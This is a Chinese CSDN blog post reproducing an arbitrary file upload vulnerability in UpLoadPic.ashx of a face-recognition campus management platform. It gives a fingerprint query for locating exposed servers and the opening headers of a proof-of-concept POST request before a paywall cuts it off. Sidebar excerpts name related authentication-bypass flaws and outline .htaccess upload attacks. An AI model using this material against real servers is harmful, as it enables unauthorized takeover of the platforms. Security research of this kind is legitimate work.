【漏洞复现】优卡特脸爱云一脸通智慧管理平台文件上传漏洞

最新推荐文章于 2024-05-30 17:04:01 发布
最新推荐文章于 2024-05-30 17:04:01 发布
阅读量564 收藏 6
点赞数 8
分类专栏: 【漏洞复现】 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/135532590
版权

Nx01 产品简介

        脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。  功能包括:系统管理中心、人员信息管理中心、设备管理中心、消费管理子系统、订餐管理子系统、水控管理子系统、电控管理子系统、考勤管理子系统、门禁通道管理子系统、会议签到管理子系统、访客管理子系统。

Nx02 漏洞描述

        深圳市优卡特电子有限公司脸爱云一脸通智慧管理平台UpLoadPic存在文件上传漏洞。攻击者可以利用UpLoadPic.ashx进行任意文件上传,获取目标服务器权限。

Nx03 产品主页

web.body="View/UserReserved/UserReservedTest.aspx"

Nx04 漏洞复现

POC:

POST /UpLoadPic.ashx HTTP/1.1
Host: {
  {Hostname}}
Content-Length: 750
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywt7cEu1eBdibB13u
Accept: */*
了解本专栏 订阅专栏 解锁全文 超级会员免费看
晚风不及你ღ
关注
  • 8
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
智慧平台 UpLoadPic.ashx 文件致RCE漏洞
0xSec
04-29 348
智慧管理平台/UpLoadPic.ashx接口处存在文件漏洞,未经身份认证的攻击者可以过此漏洞恶意后门文件,造成信息泄露和后台接管(edu刷分神洞)
漏洞是什么如何.txt
01-31
漏洞
phpcmsv9.0任意文件漏洞解析
01-19
漏洞存在地址: burp抓包 POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/
漏洞智慧管理平台未授权漏洞
晚风不及你
01-11 413
智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一系统。无需安装,只需在后台配置即可在浏览器登录。功能包括:系统管理中心、人员信息管理中心、设备管理中心、消费管理子系统、订餐管理子系统、水控管理子系统、电控管理子系统、考勤管理子系统、门禁管理子系统、会议签到管理子系统、访客管理子系统。
【CVE-2023-6099】智慧管理平台权限绕过漏洞(2023年11月发布)
m0_73896875的博客
11-22 896
智慧管理平台/SystemMng.ashx接口处存在权限绕过漏洞过输入00操纵参数operatorRole,导致管理不当,未经身份认证的攻击者可以过此漏洞创建超级管理员账户,造成信息泄露和后台接管漏洞等级高危影响版本漏洞类型身份认证绕过。
(新接口)用友GRP-U8多个接口存在SQL 注入漏洞-0day
weixin_43167326的博客
02-22 369
用友GRP-U8是用友公司推出的一款企业级管理软件,涵盖财务、人力资源、供应链等多个领域,适用于各类企业。该系统拥有灵活的定制化功能,可根据企业需求进行模块选择和定制开发,满足不同行业的管理需求。用友GRP-U8整合了企业各业务环节,实信息共享和流程化,帮助企业提高管理效率,降低成本,提升竞争力。
漏洞智慧管理平台信息泄露漏洞
晚风不及你
01-11 582
智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一系统。无需安装,只需在后台配置即可在浏览器登录。功能包括:系统管理中心、人员信息管理中心、设备管理中心、消费管理子系统、订餐管理子系统、水控管理子系统、电控管理子系统、考勤管理子系统、门禁管理子系统、会议签到管理子系统、访客管理子系统。
智慧管理平台权限绕过漏洞【CVE-2023-6099】
holyxp的博客
11-20 717
智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一系统。无需安装,只需在后台配置即可在浏览器登录。功能包括:系统管理中心、人员信息管理中心、设备管理中心、消费管理子系统、订餐管理子系统、水控管理子系统、电控管理子系统、考勤管理子系统、门禁管理子系统、会议签到管理子系统、访客管理子系统。
智慧管理平台权限绕过漏洞(CVE-2023-6099)
0xSec
11-19 762
智慧管理平台/SystemMng.ashx接口处存在权限绕过漏洞过输入00操纵参数operatorRole,导致管理不当,未经身份认证的攻击者可以过此漏洞创建超级管理员账户,造成信息泄露和后台接管
漏洞智慧管理平台权限绕过漏洞CVE-2023-6099(1day)
失心少年
01-14 252
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!智慧管理平台1.0.55.0.0.1及其以下版本SystemMng.ashx接口处存在权限绕过漏洞过输入00操纵参数operatorRole,导致管理不当,未经身份认证的攻击者可以过此漏洞创建超级管理员账户。登录后台可以看到拥有管理员权限。
网络安全中攻击溯源方法
2301_76786857的博客
05-29 1321
攻击溯源可以帮助用户对攻击放进行锁定放入数据库,可以帮助其他用户进行态势感知,同时可以协调相关组织打击违法犯罪行为,避免下一次的攻击。2、分析攻击征:过分析攻击事件的征,如攻击方式、攻击时间、攻击目标等,来确定攻击类型和攻击者的点。4、分析攻击工具:过分析攻击者使用的工具、恶意代码等,确定攻击者的攻击技术和水平,进而锁定攻击者身份。5、建立攻击链路:过对攻击事件的各个环节进行分析,建立攻击链路,找到攻击者入侵的路径和方法。1、收集证据:收集攻击事件的各种证据,包括日志、网络数据包、磁盘镜像等。
【Python安全攻防】【网络安全】一、常见被动信息搜集手段
weixin_43031313的博客
05-28 1401
执行上述命令后,导入会报错(找不到Whois模块)(在PyCharm中,IDLE则未出此问题),需要在报错处再次执行安装命令。《Python安全攻防——渗透测试实战指南》,MS08067安全实验室 编著,北京,机械工业出版社,2021年10月第1版。:用来查询域名是否已经被注册,以及注册域名的详细信息。参数host为目标的URL,返回对应的ip地址。:过目标URL查询目标的IP地址。
我的网络安全之路——一场诗意的邂逅
Ms08067安全实验室
05-30 1301
文章来源|MS08067 安全实验室本文作者:tuooo我的网络安全之路一场诗意的邂逅童年的星光中,我仰望着璀璨的荧屏,心怀对未知机器世界的浩瀚与好奇。那时的我,每每想到各种游戏的破解版本与工具,便会被技术的魅力所折服。在旁人对游戏破解的侃侃言谈中默默聆听,我宛如一粒被星辰吸引的尘埃,在无意识中仰望着网络安全这片神秘的宇宙。 高考填报志愿时,我毫不犹豫地选择了网络安全。那一刻,我仿佛视...
数据预处理之基于统计的异常值检测
最新发布
06-10
matlab+数据预处理+统计+异常值+检测+适用维度较小的数据 基于统计的异常值检测是一种利用统计学原理和技术来识别数据集中异常值或离群点的方法。这种方法过考察数据集的统计性来发与其他样本显著不同的观测值。我们可以利用几种常见的方法,包括3σ(sigma)准则、Z分数(Z-score)和Boxplot(箱线图)。
htaccess文件漏洞
09-21
### 回答1: 请注意,.htaccess文件本身并不会造成上漏洞,它是一种用于配置Apache服务器的文件。我猜测您的问题是如何利用配置错误或者漏洞.htaccess文件来实服务器攻击的。 一些常见的.htaccess文件漏洞如下: 1. 目录遍历漏洞: 如果一个服务器上的网站没有正确限制文件的目录,攻击者可以上包含攻击代码的.htaccess文件到网站的某个目录,然后过访问该目录下的文件来执行攻击代码。 2. 文件名绕过漏洞: 有些服务器在处理上文件名时可能会忽略.htaccess后缀,因此攻击者可以上包含攻击代码的.htaccess文件并将其命名为其他文件类型的后缀名,例如.php、.jpg、.gif等,然后过访问该文件来执行攻击代码。 3. MIME类型绕过漏洞: 攻击者可以上一个包含攻击代码的.htaccess文件,并在其中设置MIME类型为可执行文件,这样当服务器处理该文件时就会将其作为可执行文件来执行其中的代码。 请注意,这些漏洞都是由于服务器配置错误或者漏洞造成的,因此最好的解决方法是及时更新服务器软件并开启安全防护措施,例如限制上文件的类型、大小、目录等。同时,还应该定期检查服务器配置和日志来发潜在的安全问题。 ### 回答2: .htaccess文件漏洞是一种常见的Web漏洞之一,攻击者可以过该漏洞恶意的.htaccess文件来对受影响的网站进行进一步的攻击。 首先,攻击者需要找到使用了.htaccess文件的目标网站,因为只有使用了.htaccess文件的网站才会存在这个漏洞。然后,攻击者需要找到可以上文件的功能或接口,这可能是一个后台管理系统、论坛或其他用户交互的页面。 接下来,攻击者需要准备一个恶意的.htaccess文件。这个文件可以包含任意的指令,用于控制网站的访问权限、重定向链接、阻止定的IP地址或用户等。例如,攻击者可以将.htaccess文件设置为重定向用户流量到恶意网站或者隐藏敏感文件等。 然后,攻击者过上功能或接口将准备好的.htaccess文件到目标网站的服务器上。在上文件时,攻击者可能会利用一些漏洞或者绕过文件过滤的技巧,以确保文件被成功上。 最后,攻击者需要验证上的.htaccess文件是否生效。他们可以过访问目标网站来检查是否按照设定的指令进行了操作。如果.htaccess文件成功生效,那么攻击者将获得对目标网站重要功能的控制,可能会导致进一步的攻击活动。 为了防止.htaccess文件漏洞的利用,网站管理员可以采取以下措施: 1. 检查服务器的配置,确保禁止上.htaccess文件或限制其使用; 2. 对文件功能进行严格的输入验证和过滤,过滤掉恶意的文件类型和内容; 3. 及时更新软件和补丁,确保服务器和相关软件的安全; 4. 启用防火墙和入侵检测系统,以便及时发和阻止任何恶意活动; 5. 加强对服务器和网站的监控和日志记录,及时发异常行为。 总之,.htaccess文件漏洞是一种严重的Web安全威胁,攻击者可以利用该漏洞来控制目标网站。为了保护网站的安全,网站管理员需要及时修漏洞,并采取适当的预防措施来阻止该漏洞的利用。 ### 回答3: .htaccess文件漏洞是一种安全漏洞,它可能允许攻击者将恶意文件到服务器上,并在服务器上执行任意代码。 要.htaccess文件漏洞,可以按照以下步骤进行: 1. 首先,需要找到一个存在.htaccess文件漏洞的目标网站。这可以过向目标网站发送恶意文件请求或者查找已知的漏洞报告来实。 2. 确定目标网站的文件功能是否存在安全漏洞。这可以过上不同类型的文件来测试是否可以绕过文件类型限制。 3. 如果文件功能存在漏洞,则可以使用.htaccess文件进行攻击。创建一个包含恶意代码的.htaccess文件,例如包含PHP代码的.htaccess文件。 4. 过网站的文件功能上制作好的.htaccess文件。如果上成功,那么.htaccess文件将被保存在服务器上,并且服务器将执行其中的恶意代码。 5. 最后,攻击者可以利用已经成功上的.htaccess文件执行各种恶意操作,例如在服务器上创建后门、执行任意命令、获取敏感数据等。 为了防止.htaccess文件漏洞,应采取以下预防措施: 1. 对文件功能进行严格的输入验证和过滤,确保只能上安全的文件类型。 2. 对上文件进行严格的文件类型检查,避免可以执行恶意代码的文件类型被上。 3. 设置最小化的文件权限,仅允许必要的文件操作。 4. 定期更新网站的软件和插件,以保持与最新的安全修补程序同步。 5. 监控网站的日志文件,及时发异常文件行为。 总之,.htaccess文件漏洞是一种严重的安全威胁,为了保护网站和用户的安全,应该进行安全验证和限制,以防止攻击者利用该漏洞进行恶意操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值